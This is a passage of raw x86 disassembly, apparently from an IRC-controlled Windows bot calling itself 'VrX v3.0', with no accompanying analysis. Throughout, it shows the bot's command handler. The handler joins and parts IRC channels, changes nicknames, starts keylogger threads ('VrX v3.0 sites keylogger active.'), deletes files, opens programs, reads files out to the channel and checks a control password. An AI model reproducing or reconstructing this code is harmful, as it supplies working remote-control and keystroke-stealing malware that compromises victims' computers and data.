cmp [ebp+var_2220], ebx
jnz short loc_40885A
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_40882D
; ---------------------------------------------------------------------------
loc_40883F: ; CODE XREF: sub_401ACD+6D5E�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset dword_42A2F8
loc_40884B: ; CODE XREF: sub_401ACD+6CAD�j
lea eax, [ebp+var_2C4]
push eax
call sub_41C266
add esp, 0Ch
loc_40885A: ; CODE XREF: sub_401ACD+6C91�j
; sub_401ACD+6D66�j
cmp [ebp+var_8], ebx
jnz loc_403FBE
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push esi
jmp loc_403FB6
; ---------------------------------------------------------------------------
loc_40887A: ; CODE XREF: sub_401ACD+48BD�j
; sub_401ACD+48D4�j
push [ebp+arg_18]
lea eax, [ebp+var_2C4]
push offset aPartS_0 ; "PART %s"
push eax
call sub_41C266
push edi
call sub_41C159
add esp, 10h
loc_408897: ; CODE XREF: sub_401ACD+6E31�j
test eax, eax
jle loc_409644
push edi
call sub_41C159
cmp eax, 400h
pop ecx
jge loc_409644
loc_4088B1: ; CODE XREF: sub_401ACD+789B�j
lea eax, [ebp+var_2C4]
push eax
push offset aS ; "%s\r\n"
push edi
call sub_41C159
imul eax, 234h
pop ecx
push dword_43E91C[eax]
call sub_409823
jmp loc_4048F0
; ---------------------------------------------------------------------------
loc_4088DA: ; CODE XREF: sub_401ACD+488F�j
; sub_401ACD+48A6�j
push [ebp+esi+var_84]
lea eax, [ebp+var_2C4]
push [ebp+arg_18]
push offset aJoinSS_0 ; "JOIN %s %s"
push eax
call sub_41C266
push edi
call sub_41C159
add esp, 14h
jmp short loc_408897
; ---------------------------------------------------------------------------
loc_408900: ; CODE XREF: sub_401ACD+4861�j
; sub_401ACD+4878�j
push [ebp+arg_18]
lea eax, [ebp+var_2C4]
push offset aNickS_0 ; "NICK %s"
push eax
call sub_41C266
push edi
call sub_41C159
add esp, 10h
test eax, eax
jle loc_409644
push edi
call sub_41C159
cmp eax, 400h
pop ecx
jge loc_409644
lea eax, [ebp+var_2C4]
push eax
push offset aS ; "%s\r\n"
push edi
call sub_41C159
imul eax, 234h
pop ecx
push dword_43E91C[eax]
call sub_409823
add esp, 0Ch
push [ebp+arg_18]
push edi
push offset dword_42A2C0
loc_408967: ; CODE XREF: sub_401ACD+6F24�j
; sub_401ACD+6F92�j ...
call sub_415DAC
jmp loc_4048F0
; ---------------------------------------------------------------------------
loc_408971: ; CODE XREF: sub_401ACD+4833�j
; sub_401ACD+484A�j
cmp [ebp+var_C], ebx
jz loc_409644
push [ebp+arg_18]
push [ebp+var_C]
call sub_41C2E0
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_4089A2
push esi
lea eax, [ebp+var_2C4]
push offset aModeS ; "MODE %s"
push eax
call sub_41C266
add esp, 0Ch
loc_4089A2: ; CODE XREF: sub_401ACD+6EBE�j
push edi
call sub_41C159
test eax, eax
pop ecx
jle loc_409644
push edi
call sub_41C159
cmp eax, 400h
pop ecx
jge loc_409644
lea eax, [ebp+var_2C4]
push eax
push offset aS ; "%s\r\n"
push edi
call sub_41C159
imul eax, 234h
pop ecx
push dword_43E91C[eax]
call sub_409823
add esp, 0Ch
push esi
push edi
push offset dword_42A29C
jmp loc_408967
; ---------------------------------------------------------------------------
loc_4089F6: ; CODE XREF: sub_401ACD+4805�j
; sub_401ACD+481C�j
cmp [ebp+var_C], ebx
jz loc_409644
push [ebp+arg_18]
push [ebp+var_C]
call sub_41C2E0
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_409644
push edi
call sub_41C159
test eax, eax
pop ecx
jle loc_409644
push edi
call sub_41C159
cmp eax, 400h
pop ecx
jge loc_409644
push esi
push offset aS ; "%s\r\n"
push edi
call sub_41C159
imul eax, 234h
pop ecx
push dword_43E91C[eax]
call sub_409823
add esp, 0Ch
push esi
push edi
push offset dword_42A280
jmp loc_408967
; ---------------------------------------------------------------------------
loc_408A64: ; CODE XREF: sub_401ACD+47D7�j
; sub_401ACD+47EE�j
cmp [ebp+var_C], ebx
jz loc_409644
push edi
push [ebp+var_C]
call sub_41C2E0
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_409644
push esi
push offset aModeS_0 ; "MODE %s\r\n"
push [ebp+arg_4]
call sub_409823
add esp, 0Ch
push esi
push offset unk_42A258
jmp loc_40963D
; ---------------------------------------------------------------------------
loc_408A9E: ; CODE XREF: sub_401ACD+47A9�j
; sub_401ACD+47C0�j
push [ebp+var_8C]
push offset dword_42CCC8
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jz loc_401F75
push [ebp+arg_18]
push offset aPartS_1 ; "PART %s\r\n"
push [ebp+arg_4]
call sub_409823
push edi
call sub_41C159
imul eax, 3E8h
add esp, 10h
push eax
call ds:dword_427080 ; Sleep
push [ebp+esi+var_84]
push [ebp+arg_18]
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_409823
push offset dword_42A238
call sub_415D38
jmp loc_4034BF
; ---------------------------------------------------------------------------
loc_408B04: ; CODE XREF: sub_401ACD+477B�j
; sub_401ACD+4792�j
cmp [ebp+var_C], ebx
jz loc_409644
push edi
call sub_41B9C0
push [ebp+arg_8]
mov esi, eax
call sub_41B9C0
add eax, [ebp+var_C]
push [ebp+arg_18]
lea eax, [eax+esi+2]
push eax
call sub_41C2E0
mov esi, eax
add esp, 10h
cmp esi, ebx
jz loc_409644
push esi
lea eax, [ebp+var_2C4]
push offset dword_42A968
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_2C4]
push ebx
push eax
push edi
push [ebp+arg_4]
call sub_409869
add esp, 20h
push esi
push edi
push offset unk_42A21C
jmp loc_408967
; ---------------------------------------------------------------------------
loc_408B6D: ; CODE XREF: sub_401ACD+474D�j
; sub_401ACD+4764�j
cmp [ebp+var_C], ebx
jz loc_409644
push edi
call sub_41B9C0
push [ebp+arg_8]
mov esi, eax
call sub_41B9C0
add eax, [ebp+var_C]
push [ebp+arg_18]
lea eax, [eax+esi+2]
push eax
call sub_41C2E0
mov esi, eax
add esp, 10h
cmp esi, ebx
jz loc_409644
push ebx
push ebx
push esi
push edi
push [ebp+arg_4]
call sub_409869
add esp, 14h
push esi
push edi
push offset unk_42A200
jmp loc_408967
; ---------------------------------------------------------------------------
loc_408BBE: ; CODE XREF: sub_401ACD+471F�j
; sub_401ACD+4736�j
cmp [ebp+var_C], ebx
jz loc_401F75
push [ebp+arg_18]
push [ebp+var_C]
call sub_41C2E0
pop ecx
cmp eax, ebx
pop ecx
jz loc_401F75
push eax
push edi
call sub_415C40
pop ecx
pop ecx
push edi
push offset unk_42A1E4
jmp loc_40723F
; ---------------------------------------------------------------------------
loc_408BF0: ; CODE XREF: sub_401ACD+46F1�j
; sub_401ACD+4708�j
push [ebp+arg_18]
push edi
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_418A2E
loc_408C05: ; CODE XREF: sub_401ACD+25EC�j
add esp, 14h
jmp loc_401F75
; ---------------------------------------------------------------------------
loc_408C0D: ; CODE XREF: sub_401ACD+46B1�j
; sub_401ACD+46C8�j
push edi
push [ebp+arg_1C]
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jz loc_409644
mov esi, [ebp+esi+var_88]
cmp esi, ebx
jz loc_408CB1
push esi
push [ebp+var_C]
call sub_41C2E0
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_408C99
push esi
lea eax, [ebp+var_2C4]
push [ebp+var_88]
push [ebp+var_8C]
push [ebp+var_90]
push offset aSSSS ; "%s %s %s :%s"
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push 1FFh
push eax
push [ebp+arg_0]
call sub_41BFD0
add esp, 24h
lea eax, [ebp+var_2C4]
push esi
push edi
push offset unk_42A1C0
push eax
call sub_41C266
add esp, 10h
inc [ebp+arg_24]
jmp loc_408699
; ---------------------------------------------------------------------------
loc_408C99: ; CODE XREF: sub_401ACD+7171�j
lea eax, [ebp+var_2C4]
push offset unk_42A190
push eax
call sub_41C266
pop ecx
pop ecx
jmp loc_408699
; ---------------------------------------------------------------------------
loc_408CB1: ; CODE XREF: sub_401ACD+715C�j
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push [ebp+arg_4]
push [ebp+arg_1C]
push eax
call sub_41B243
add esp, 0Ch
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409869
add esp, 14h
lea eax, [ebp+var_2C4]
push edi
push offset unk_42A178
push 200h
push eax
call sub_41C360
add esp, 10h
jmp loc_408699
; ---------------------------------------------------------------------------
loc_408CFB: ; CODE XREF: sub_401ACD+4434�j
; sub_401ACD+444B�j
push edi
push 23h
push offset aKeylog_0 ; "Keylog"
push offset aVrxV3_0SitesKe ; "VrX v3.0 sites keylogger active."
loc_408D08: ; CODE XREF: sub_401ACD+103C�j
; sub_401ACD+108F�j ...
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_88]
push [ebp+arg_4]
call sub_40B648
add esp, 20h
jmp loc_401F75
; ---------------------------------------------------------------------------
loc_408D24: ; CODE XREF: sub_401ACD+4406�j
; sub_401ACD+441D�j
push 23h
call sub_40B602
test eax, eax
pop ecx
jle short loc_408D3A
push offset aKeylogerAlread ; "Keyloger Already running."
jmp loc_406E22
; ---------------------------------------------------------------------------
loc_408D3A: ; CODE XREF: sub_401ACD+7261�j
mov eax, [ebp+arg_4]
push edi
mov [ebp+var_A98], eax
mov eax, [ebp+var_4]
mov [ebp+var_A0C], eax
mov eax, [ebp+var_8]
push offset aWeb ; "web"
mov [ebp+var_A08], eax
mov [ebp+var_A10], ebx
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_408DB9
mov esi, [ebp+esi+var_88]
mov [ebp+var_A10], 1
cmp esi, ebx
jnz short loc_408D9D
mov esi, offset aF_0 ; "#f"
push offset byte_43DB88
push esi
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_408D9D
mov esi, [ebp+var_88]
loc_408D9D: ; CODE XREF: sub_401ACD+72B2�j
; sub_401ACD+72C8�j
push esi
lea eax, [ebp+var_A90]
push 80h
push eax
call sub_41C360
add esp, 0Ch
push offset aVrxV3_0SitesKe ; "VrX v3.0 sites keylogger active."
jmp short loc_408E0F
; ---------------------------------------------------------------------------
loc_408DB9: ; CODE XREF: sub_401ACD+729D�j
push edi
push offset aNormal_0 ; "normal"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz loc_408E97
mov esi, [ebp+esi+var_88]
cmp esi, ebx
jnz short loc_408DF5
mov esi, offset aF_0 ; "#f"
push offset byte_43DB88
push esi
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_408DF5
mov esi, [ebp+var_88]
loc_408DF5: ; CODE XREF: sub_401ACD+730A�j
; sub_401ACD+7320�j
push esi
lea eax, [ebp+var_A90]
push 80h
push eax
call sub_41C360
add esp, 0Ch
push offset aNormalKeyLogge ; "Normal key logger active."
loc_408E0F: ; CODE XREF: sub_401ACD+72EA�j
lea eax, [ebp+var_2C4]
push eax
call sub_41C266
pop ecx
lea eax, [ebp+var_2C4]
pop ecx
push ebx
push 23h
push eax
call sub_40B3BA
add esp, 0Ch
mov [ebp+var_A94], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_A98]
push ebx
push eax
push offset sub_4126A7
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_A94]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_408E7A
loc_408E64: ; CODE XREF: sub_401ACD+73AB�j
cmp [ebp+var_A04], ebx
jnz loc_4081AD
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_408E64
; ---------------------------------------------------------------------------
loc_408E7A: ; CODE XREF: sub_401ACD+7395�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset aFailedToStartL ; "Failed to start logging thread, error: "...
loc_408E86: ; CODE XREF: sub_401ACD+20F8�j
; sub_401ACD+2E94�j ...
lea eax, [ebp+var_2C4]
push eax
call sub_41C266
jmp loc_4081AA
; ---------------------------------------------------------------------------
loc_408E97: ; CODE XREF: sub_401ACD+72FB�j
push offset aUnknowModeType ; "Unknow mode type."
jmp loc_406E22
; ---------------------------------------------------------------------------
loc_408EA1: ; CODE XREF: sub_401ACD+4065�j
; sub_401ACD+407C�j
push offset aR ; "r"
push edi
call sub_41BEA2
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_408F0D
mov ebx, 200h
push esi
lea eax, [ebp+var_2C4]
push ebx
push eax
call sub_41C52F
add esp, 0Ch
loc_408ECA: ; CODE XREF: sub_401ACD+742C�j
test eax, eax
jz short loc_408EFB
push 1
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409869
push esi
lea eax, [ebp+var_2C4]
push ebx
push eax
call sub_41C52F
add esp, 20h
jmp short loc_408ECA
; ---------------------------------------------------------------------------
loc_408EFB: ; CODE XREF: sub_401ACD+73FF�j
push esi
call sub_41BA3B
pop ecx
push edi
push offset unk_42A0A4
jmp loc_409091
; ---------------------------------------------------------------------------
loc_408F0D: ; CODE XREF: sub_401ACD+73E5�j
push edi
push offset unk_42A084
jmp loc_406BEF
; ---------------------------------------------------------------------------
loc_408F18: ; CODE XREF: sub_401ACD+4037�j
; sub_401ACD+404E�j
cmp [ebp+var_C], ebx
jz loc_409644
push edi
push [ebp+var_C]
call sub_41C2E0
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_409644
push offset asc_42A080 ; "\n"
push esi
call sub_41C8A0
push esi
call sub_419F9D
add esp, 0Ch
test eax, eax
jnz short loc_408F55
push offset unk_42A054
jmp short loc_408FA2
; ---------------------------------------------------------------------------
loc_408F55: ; CODE XREF: sub_401ACD+747F�j
push esi
lea eax, [ebp+var_2C4]
push offset dword_42A03C
push eax
call sub_41C266
add esp, 0Ch
jmp loc_408699
; ---------------------------------------------------------------------------
loc_408F6F: ; CODE XREF: sub_401ACD+4009�j
; sub_401ACD+4020�j
cmp [ebp+var_C], ebx
jz loc_409644
push edi
push [ebp+var_C]
call sub_41C2E0
pop ecx
cmp eax, ebx
pop ecx
jz loc_409644
push eax
call sub_41875E
test eax, eax
pop ecx
jnz short loc_408F9D
push offset unk_42A01C
jmp short loc_408FA2
; ---------------------------------------------------------------------------
loc_408F9D: ; CODE XREF: sub_401ACD+74C7�j
push offset dword_42A000
loc_408FA2: ; CODE XREF: sub_401ACD+7486�j
; sub_401ACD+74CE�j
lea eax, [ebp+var_2C4]
push eax
call sub_41C266
pop ecx
pop ecx
jmp loc_408678
; ---------------------------------------------------------------------------
loc_408FB5: ; CODE XREF: sub_401ACD+3FDB�j
; sub_401ACD+3FF2�j
push 7Fh
lea eax, [ebp+var_2084]
push edi
push eax
call sub_41BFD0
mov esi, [ebp+esi+var_88]
add esp, 0Ch
cmp esi, ebx
jz short loc_408FE4
push 7Fh
lea eax, [ebp+var_2004]
push esi
push eax
call sub_41BFD0
add esp, 0Ch
loc_408FE4: ; CODE XREF: sub_401ACD+7503�j
push 7Fh
lea eax, [ebp+var_1F84]
push [ebp+var_88]
push eax
call sub_41BFD0
mov eax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_2088], eax
mov eax, [ebp+var_8]
mov [ebp+var_1F00], eax
mov eax, [ebp+var_4]
mov [ebp+var_1EFC], eax
push edi
lea eax, [ebp+var_2C4]
push offset dword_429FE8
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_2C4]
push 1Ch
push eax
call sub_40B3BA
add esp, 18h
mov [ebp+var_1F04], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_2088]
push ebx
push eax
push offset sub_41B302
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_1F04]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_409085
loc_40906F: ; CODE XREF: sub_401ACD+75B6�j
cmp [ebp+var_1EF8], ebx
jnz loc_406C1F
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_40906F
; ---------------------------------------------------------------------------
loc_409085: ; CODE XREF: sub_401ACD+75A0�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_429FA8
loc_409091: ; CODE XREF: sub_401ACD+298B�j
; sub_401ACD+743B�j
lea eax, [ebp+var_2C4]
push eax
call sub_41C266
add esp, 0Ch
jmp loc_406C1F
; ---------------------------------------------------------------------------
loc_4090A5: ; CODE XREF: sub_401ACD+3FAD�j
; sub_401ACD+3FC4�j
push ebx
push [ebp+var_88]
push [ebp+arg_4]
push edi
call sub_41036B
add esp, 10h
push edi
push offset dword_429F90
jmp loc_40963D
; ---------------------------------------------------------------------------
loc_4090C3: ; CODE XREF: sub_401ACD+3F7F�j
; sub_401ACD+3F96�j
push 14h
lea eax, [ebp+var_1D4C]
push ebx
push eax
call sub_41BF70
add esp, 0Ch
lea eax, [ebp+var_1D38]
push edi
push offset aS_8 ; "%s"
push eax
call sub_41C266
mov eax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_1D54], eax
lea eax, [ebp+var_C4]
push eax
lea eax, [ebp+var_1C34]
push 80h
push eax
call sub_41C360
mov eax, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_1BAC], eax
mov eax, [ebp+var_8]
mov [ebp+var_1BA8], eax
lea eax, [ebp+var_1C34]
push eax
lea eax, [ebp+var_1D38]
push eax
lea eax, [ebp+var_2C4]
push offset unk_429F6C
push eax
call sub_41C266
push ebx
lea eax, [ebp+var_2C4]
push 1Ah
push eax
call sub_40B3BA
add esp, 1Ch
mov [ebp+var_1BB0], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1D54]
push ebx
push eax
push offset sub_4161C1
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_1BB0]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz loc_4023CA
loc_40918A: ; CODE XREF: sub_401ACD+76D1�j
cmp [ebp+var_1BA4], ebx
jnz loc_4082DE
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_40918A
; ---------------------------------------------------------------------------
loc_4091A0: ; CODE XREF: sub_401ACD+3F51�j
; sub_401ACD+3F68�j
push edi
call ds:dword_427088 ; DeleteFileA
test eax, eax
jz short loc_4091C7
push edi
push offset dword_429F50
lea eax, [ebp+var_2C4]
push 200h
push eax
call sub_41C360
jmp loc_40929A
; ---------------------------------------------------------------------------
loc_4091C7: ; CODE XREF: sub_401ACD+76DC�j
push offset dword_42A5A8
call sub_418699
pop ecx
push eax
jmp loc_403EED
; ---------------------------------------------------------------------------
loc_4091D8: ; CODE XREF: sub_401ACD+3F23�j
; sub_401ACD+3F3A�j
push edi
call sub_41C159
push eax
call sub_419F16
pop ecx
pop ecx
push 1
pop esi
cmp eax, esi
push edi
jnz short loc_4091F5
push offset unk_429F2C
jmp short loc_4091FA
; ---------------------------------------------------------------------------
loc_4091F5: ; CODE XREF: sub_401ACD+771F�j
push offset unk_429EFC
loc_4091FA: ; CODE XREF: sub_401ACD+7726�j
lea eax, [ebp+var_2C4]
push eax
call sub_41C266
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz loc_406C22
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409869
add esp, 14h
jmp loc_406C22
; ---------------------------------------------------------------------------
loc_409233: ; CODE XREF: sub_401ACD+3EF5�j
; sub_401ACD+3F0C�j
push ebx
push ebx
push edi
push [ebp+var_4]
push ebx
push [ebp+arg_4]
call sub_419C09
add esp, 18h
cmp eax, 1
push edi
jnz short loc_409255
push offset unk_429EDC
jmp loc_406BEF
; ---------------------------------------------------------------------------
loc_409255: ; CODE XREF: sub_401ACD+777C�j
push offset unk_429EAC
jmp loc_406BEF
; ---------------------------------------------------------------------------
loc_40925F: ; CODE XREF: sub_401ACD+3EC7�j
; sub_401ACD+3EDE�j
push edi
call dword_4CBA14 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+var_2D8], eax
jz short loc_4092A2
push 2
lea eax, [ebp+var_2D8]
push 4
push eax
call dword_4CB98C ; gethostbyaddr
cmp eax, ebx
jz short loc_4092BD
push dword ptr [eax]
loc_409288: ; CODE XREF: sub_401ACD+77EE�j
push edi
lea eax, [ebp+var_2C4]
push offset unk_429E8C
push eax
call sub_41C266
loc_40929A: ; CODE XREF: sub_401ACD+76F5�j
add esp, 10h
jmp loc_406BFE
; ---------------------------------------------------------------------------
loc_4092A2: ; CODE XREF: sub_401ACD+77A2�j
push edi
call dword_4CBA58 ; gethostbyname
cmp eax, ebx
jz short loc_4092BD
mov eax, [eax+0Ch]
mov eax, [eax]
push dword ptr [eax]
call dword_4CBA60 ; inet_ntoa
push eax
jmp short loc_409288
; ---------------------------------------------------------------------------
loc_4092BD: ; CODE XREF: sub_401ACD+77B7�j
; sub_401ACD+77DE�j
push offset unk_429E64
jmp loc_4084F5
; ---------------------------------------------------------------------------
loc_4092C7: ; CODE XREF: sub_401ACD+3E99�j
; sub_401ACD+3EB0�j
push 7Fh
push edi
push [ebp+arg_14]
call sub_41BFD0
add esp, 0Ch
push edi
push offset unk_429E40
jmp loc_408E86
; ---------------------------------------------------------------------------
loc_4092E0: ; CODE XREF: sub_401ACD+3E6B�j
; sub_401ACD+3E82�j
push 5
push ebx
push ebx
push edi
push offset aOpen ; "open"
push ebx
call dword_4CB940
test eax, eax
push edi
jz short loc_409300
push offset unk_429E20
jmp loc_406BEF
; ---------------------------------------------------------------------------
loc_409300: ; CODE XREF: sub_401ACD+7827�j
push offset unk_429DFC
jmp loc_406BEF
; ---------------------------------------------------------------------------
loc_40930A: ; CODE XREF: sub_401ACD+3E3D�j
; sub_401ACD+3E54�j
mov al, [edi]
mov byte_429094, al
movsx eax, byte ptr [edi]
push eax
push offset unk_429DD8
jmp loc_408E86
; ---------------------------------------------------------------------------
loc_40931F: ; CODE XREF: sub_401ACD+3E0F�j
; sub_401ACD+3E26�j
push edi
call sub_41C159
test eax, eax
pop ecx
jle loc_409644
push edi
call sub_41C159
cmp eax, 400h
pop ecx
jge loc_409644
push ebx
push ebx
lea eax, [ebp+var_A0]
push 2
push eax
call sub_40AE84
add esp, 10h
push eax
lea eax, [ebp+var_2C4]
push offset aNickS_0 ; "NICK %s"
push eax
call sub_41C266
add esp, 0Ch
jmp loc_4088B1
; ---------------------------------------------------------------------------
loc_40936D: ; CODE XREF: sub_401ACD+3DE1�j
; sub_401ACD+3DF8�j
push edi
call sub_41C159
test eax, eax
pop ecx
jle loc_401F75
push edi
call sub_41C159
cmp eax, 400h
pop ecx
jge loc_401F75
push offset aQuitLater ; "QUIT :later\r\n"
push edi
call sub_41C159
imul eax, 234h
pop ecx
push dword_43E91C[eax]
call sub_409823
pop ecx
pop ecx
push 1F4h
call ds:dword_427080 ; Sleep
push edi
call sub_41C159
imul eax, 234h
pop ecx
push dword_43E91C[eax]
call dword_4CBA6C ; closesocket
push [ebp+var_10]
push edi
call sub_41C159
imul eax, 234h
pop ecx
push dword_43E924[eax]
call ds:dword_4270B4 ; TerminateThread
push edi
call sub_41C159
imul eax, 234h
push edi
mov dword_43E924[eax], ebx
call sub_41C159
imul eax, 234h
pop ecx
pop ecx
mov byte ptr dword_43E710[eax], bl
jmp loc_401F75
; ---------------------------------------------------------------------------
loc_409418: ; CODE XREF: sub_401ACD+3DB3�j
; sub_401ACD+3DCA�j
push edi
push offset aAll ; "all"
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_409447
call sub_40B583
cmp eax, ebx
jle short loc_40943D
push eax
push offset unk_429DAC
jmp loc_40723F
; ---------------------------------------------------------------------------
loc_40943D: ; CODE XREF: sub_401ACD+7963�j
push offset unk_429D84
jmp loc_403F8F
; ---------------------------------------------------------------------------
loc_409447: ; CODE XREF: sub_401ACD+795A�j
mov eax, [ebp+var_AC]
lea edi, [eax+1]
cmp edi, 20h
jnb loc_401F75
lea eax, [ebp+edi*4+var_90]
mov [ebp+arg_24], eax
loc_409463: ; CODE XREF: sub_401ACD+7A07�j
mov eax, [ebp+arg_24]
mov esi, [eax]
cmp esi, ebx
jz loc_401F75
push esi
call sub_41C159
push eax
call sub_40B4F5
pop ecx
pop ecx
test eax, eax
push esi
jz short loc_40948A
push offset unk_429D60
jmp short loc_40948F
; ---------------------------------------------------------------------------
loc_40948A: ; CODE XREF: sub_401ACD+79B4�j
push offset unk_429D34
loc_40948F: ; CODE XREF: sub_401ACD+79BB�j
lea eax, [ebp+var_2C4]
push eax
call sub_41C266
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_4094BF
push ebx
lea eax, [ebp+var_2C4]
push [ebp+var_4]
push eax
push [ebp+var_88]
push [ebp+arg_4]
call sub_409869
add esp, 14h
loc_4094BF: ; CODE XREF: sub_401ACD+79D4�j
lea eax, [ebp+var_2C4]
push eax
call sub_415D38
add [ebp+arg_24], 4
inc edi
cmp edi, 20h
pop ecx
jb short loc_409463
jmp loc_401F75
; ---------------------------------------------------------------------------
loc_4094DB: ; CODE XREF: sub_401ACD+3D85�j
; sub_401ACD+3D9C�j
cmp [ebp+var_C], ebx
jz loc_409644
push edi
push [ebp+var_C]
call sub_41C2E0
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_409644
push esi
push offset aS ; "%s\r\n"
push [ebp+arg_4]
call sub_409823
add esp, 0Ch
push esi
push offset unk_429D1C
jmp loc_40963D
; ---------------------------------------------------------------------------
loc_409515: ; CODE XREF: sub_401ACD+3D57�j
; sub_401ACD+3D6E�j
push edi
push offset aPartS_1 ; "PART %s\r\n"
push [ebp+arg_4]
call sub_409823
add esp, 0Ch
push edi
push offset unk_429CFC
jmp loc_40963D
; ---------------------------------------------------------------------------
loc_409531: ; CODE XREF: sub_401ACD+3D29�j
; sub_401ACD+3D40�j
push [ebp+esi+var_88]
push edi
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_409823
add esp, 10h
push edi
push offset unk_429CDC
jmp loc_40963D
; ---------------------------------------------------------------------------
loc_409554: ; CODE XREF: sub_401ACD+3CFB�j
; sub_401ACD+3D12�j
push edi
push offset aNickS ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_409823
add esp, 0Ch
push edi
push offset unk_429CB8
jmp loc_40963D
; ---------------------------------------------------------------------------
loc_409570: ; CODE XREF: sub_401ACD+3123�j
; sub_401ACD+313A�j
push offset aQuitReconnecti ; "QUIT :reconnecting\r\n"
push [ebp+arg_4]
call sub_409823
pop ecx
lea eax, [ebp+var_2C4]
pop ecx
push edi
push offset unk_429C98
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_415D38
push edi
call sub_41C159
add esp, 14h
loc_4095A6: ; CODE XREF: sub_401ACD+7B23�j
push eax
call ds:dword_427080 ; Sleep
loc_4095AD: ; CODE XREF: sub_401ACD+2A5F�j
xor eax, eax
jmp loc_401F78
; ---------------------------------------------------------------------------
loc_4095B4: ; CODE XREF: sub_401ACD+30F5�j
; sub_401ACD+310C�j
push offset aQuitReconnecti ; "QUIT :reconnecting\r\n"
push [ebp+arg_4]
call sub_409823
pop ecx
lea eax, [ebp+var_2C4]
pop ecx
push edi
push offset unk_429C70
push eax
call sub_41C266
lea eax, [ebp+var_2C4]
push eax
call sub_415D38
push edi
call sub_41C159
add esp, 14h
imul eax, 3E8h
jmp short loc_4095A6
; ---------------------------------------------------------------------------
loc_4095F2: ; CODE XREF: sub_401ACD+EAD�j
; sub_401ACD+EC2�j
push [ebp+esi+var_8C]
xor eax, eax
cmp [ebp+var_8F0], bl
setnz al
push eax
lea eax, [ebp+var_338]
push dword_42909C
push eax
call sub_40AE84
add esp, 10h
lea eax, [ebp+var_338]
push eax
push offset aNickS ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_409823
add esp, 0Ch
lea eax, [ebp+var_338]
push eax
push offset unk_429C4C
loc_40963D: ; CODE XREF: sub_401ACD+6FCC�j
; sub_401ACD+75F1�j ...
call sub_415DAC
pop ecx
loc_409643: ; CODE XREF: sub_401ACD+6BD8�j
pop ecx
loc_409644: ; CODE XREF: sub_401ACD+63D�j
; sub_401ACD+649�j ...
mov eax, [ebp+arg_24]
jmp loc_401F78
; ---------------------------------------------------------------------------
loc_40964C: ; CODE XREF: sub_401ACD+A98�j
; sub_401ACD+AAD�j
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
mov [ebp+arg_20], esi
jz loc_401F75
cmp [ebp+var_A4], ebx
jnz loc_401F75
push offset asc_42CDBC ; "!"
push [ebp+var_90]
call sub_41CAD4
mov esi, eax
push offset word_4CB88C
push ebx
inc esi
call sub_41CAD4
push offset asc_429C48 ; "~"
push eax
call sub_41CAD4
push [ebp+arg_20]
mov edi, eax
push offset aCool ; "cool"
call sub_41CA50
add esp, 20h
test eax, eax
jz short loc_4096EB
lea eax, [ebp+var_C4]
push edi
push eax
lea eax, [ebp+var_C4]
push eax
push offset aNoticeSPassAut ; "NOTICE %s :Pass auth failed (%s!%s).\r\n"
push [ebp+arg_4]
call sub_409823
add esp, 14h
lea eax, [ebp+var_C4]
push eax
push offset aNoticeSYourAtt ; "NOTICE %s :Your attempt has been logged"...
push [ebp+arg_4]
call sub_409823
add esp, 0Ch
push edi
push esi
push offset unk_429BC8
jmp loc_4023EE
; ---------------------------------------------------------------------------
loc_4096EB: ; CODE XREF: sub_401ACD+7BDA�j
mov [ebp+arg_24], offset off_42915C
